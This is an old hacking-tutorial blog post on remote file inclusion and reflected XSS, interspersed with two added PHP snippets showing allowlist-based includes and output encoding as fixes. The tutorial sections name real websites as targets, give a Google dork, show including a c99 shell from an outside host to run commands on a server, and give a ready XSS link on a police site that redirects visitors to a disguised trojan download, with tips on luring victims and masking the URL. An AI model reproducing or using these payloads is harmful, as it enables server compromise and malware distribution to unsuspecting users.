
Hacking Website Using Remote File Inclusion

Thursday, 01 December 2011

Welcome back to hacking-class. In this article I will talk about Remote File Inclusion. It is one of the most common vulnerabilities found in web applications. This type of vulnerability allows the hacker or attacker to add a remote file on the web server. If the attacker is successful in performing the attack, he/she will gain access to the web server and hence can execute any command on it.

1-Searching the Vulnerability
Remote File Inclusion vulnerability usually occurs in sites which have a URL similar to the one below.
The Google Dork is
“inurl:index.php?page=”
This will show all the pages which have “index.php?page=” in their URL. Now, to test whether the website is vulnerable to Remote File Inclusion or not, the hacker normally uses the following command


But as I am posting this here, the links must be hatke :P

I found this site; it is very good for giving you an example

http://www.cbspk.com

Now we want to check if it is vulnerable, so we type

http://www.cbspk.com/v2/index.php?page=http://www.hacking-class.blogspot.com

Now this appears



A website opens inside another website; this means the website is vulnerable to RFI.

You can also type

http://www.cbspk.com/v2/index.php?page=http://www.google.com

and you will get similar results.

OK, now moving on to the next part...


Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. 

The hacker would first upload the shells to a web hosting site such as ripway.com, 110mb.com etc.
Now here is how a hacker would execute the shells to gain access. Let's say that the URL of the shell is:

http://h1.ripway.com/saurav1234/c99shell.php?

Now here is how the hacker will execute the command on the website:

http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/saurav1234/c99shell.php?

Now voilà, we have executed the shell




Now I will not tell how to run your scripts using the shell; try finding out yourself.

Note: Remember to add “?” at the end of the URL or else the shell will not execute.

This is for educational purposes only; using this knowledge in an illegal way is strictly prohibited.
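
How the `index.php?page=` parameter should be handled on the server, as an added example that is not part of the original post: the flaw exists when the parameter value reaches PHP's `include`/`require` unchecked, and the fix is to treat it only as a key into a fixed map. The page names, the `pages/` directory and `resolve_page()` are assumptions made for illustration.

```php
<?php
// Added example; page names, pages/ directory and resolve_page() are assumptions.

// Vulnerable pattern behind index.php?page=... : the parameter goes straight
// to include. If allow_url_include is enabled in php.ini (it is Off by
// default), a URL value is fetched and executed as PHP on the server.
//   include($_GET['page']);

// Hardened resolver: the request value is only a lookup key, so no
// user-controlled string is ever passed to include/require.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page($requested, string $baseDir): ?string
{
    // Rejects arrays (?page[]=x), URLs, traversal strings and unknown names.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return $baseDir . DIRECTORY_SEPARATOR . PAGES[$requested];
}

// Constructed sample inputs (not taken from any real request log).
$samples = ['home', 'http://example.invalid/x.php?', '../../etc/passwd', ['a'], 'contact'];
foreach ($samples as $s) {
    $path  = resolve_page($s, __DIR__ . '/pages');
    $label = is_array($s) ? '(array)' : $s;
    printf("%-32s => %s\n", $label, $path ?? 'rejected (serve 404)');
}

// Use in index.php:
//   $path = resolve_page($_GET['page'] ?? 'home', __DIR__ . '/pages');
//   if ($path === null) { http_response_code(404); exit; }
//   require $path;
```

Keeping `allow_url_include = Off` in php.ini is a second layer, not a replacement for the allowlist: without the allowlist the same parameter can still be pointed at local files.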

Basic XSS Tutorial for website hacking

Intro: In this tutorial I will show you how XSS works and how you can use it.

What is an XSS ?
An XSS is a vulnerability in a web application that lets hackers execute scripts on the client side.

Dangers of XSS: these days browsers keep some of the dangers of XSS out. For example, if a script wants to write or edit files on the computer it needs extra permission from the user, or in some browsers it just gets blocked.

How does XSS Work ?

If a user posts something to a webpage (e.g. http://search.live.com/), the search engine shows what keyword the user typed.
Example:
The keyword given was: www.djoedjoe.com
You see that the search engine outputs the keyword again.
If a web application processes the input from the user
without filtering, for example the user input: xss-tutorial

it will be like this in the source:
Your keyword was: xss-tutorial
In this case it seems very normal.
But what if the user input was:


it would be in the source like this:

Your keyword was:

This doesn't look very normal on the screen:


So what happened is that the user input was actually JavaScript that didn't get filtered by the web application.
Well, this happens when a web application (like a search engine) doesn't filter the user input:
1. As keyword you enter a JavaScript.
2. The search engine checks if your keywords match the records, and then builds a page with the results.
3. The search engine builds the rest of the page (like ads and stuff) and directly (without filtering it first) puts your keyword in the page too.
4. The web server sends the page (source) to you.
5. Your browser reads every line of code from the source and shows it on the screen.
6. Finally the browser also reads your JavaScript input and executes it.
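
What step 3 should look like when the keyword is encoded before it is put into the page, as an added example that is not part of the original tutorial: each place the keyword is written (element text, attribute value, link URL) gets the encoding for that context. The function names, the `/search?q=` URL and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example; h(), render_search() and the /search?q= URL are assumptions.

// Vulnerable pattern the tutorial describes: the keyword is echoed unfiltered.
//   echo "Your keyword was: " . $_GET['q'];

// Encode for HTML element text and quoted attribute values.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Builds the results fragment; every output context is encoded separately.
function render_search(string $keyword): string
{
    // URL component context first, then HTML attribute context for the href.
    $next = '/search?q=' . rawurlencode($keyword) . '&page=2';

    return '<p>Your keyword was: ' . h($keyword) . "</p>\n"
         . '<input name="q" value="' . h($keyword) . "\">\n"
         . '<a href="' . h($next) . "\">Next page</a>\n";
}

// Constructed sample inputs: a normal keyword, markup, and an attempt to
// break out of the value="..." attribute.
$samples = ['xss-tutorial', '<script>alert(1)</script>', '" onmouseover="alert(1)'];
foreach ($samples as $kw) {
    echo render_search($kw), "\n";
}

// Defence in depth for the real page: also send a Content-Security-Policy, e.g.
//   header("Content-Security-Policy: default-src 'self'; script-src 'self'");
```

With this in place the browser in steps 5 and 6 receives `&lt;script&gt;` as text to display, so there is no script element for it to execute.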
=======================
How to find and use xss ?
=======================

XSS is dangerous because people get misled easily. There are scripts that, for example, steal user cookies, and hackers can abuse those stolen cookies. I'm not going further into cookie stealing, but I will give you another example of how to abuse XSS vulnerabilities. Like I said, you can mislead people by using those XSS vulnerabilities. You can make someone download something by using an XSS on a trusted website.
Example:
You won't expect that downloading something from http://www.lapdonline.org/ would be some kind of malware (a trojan or something). Well, let's see if we can change that. We are going to search for an XSS vulnerability on that website. Go to http://www.lapdonline.org/. You will see a search function under the banner. Let's see if the search engine filters our keyword. Enter as keyword:
Then click on GO. Yeah, it worked!
=============================
Well how can we abuse this ??
=============================

We can put JavaScript as keywords. And most people would suspect that website of something bad. So it's good enough to mislead people with it. We could enter a JavaScript that would redirect people to a trojan (in this case I'm not using a trojan). Well, if that is what we want to do, we will be using this little script then:

Go back to:
http://www.lapdonline.org/
And enter that script in the search engine and click on go.


Look at that, we have been redirected to our file. This file, named policescanner.exe, could be a trojan. You could go into a chat room or community and say it's a police scanner! You would just give the link in your browser then: http://www.lapdonline.org/search_results/search/&view_all=1&chg_filter=1&searchType=content_basic&search_terms=%3Cscript%3Edocument.location=%22http://www.technoplex.co.cc/policescanner.exe%22;%3C/script%3E
People mostly read the first part of the link before clicking on it, in this case: http://www.lapdonline.org/

Well, they are going to think it's an LAPD website, and you're talking about a police scanner, so why not download it? Maybe when someone looks closely he might see the link to your trojan,
http://tuts.djoedjoe.com/basicxss/eng/policescanner.exe and they will notice it's fake. But no worries, with a URL encoder you can 'mask' that.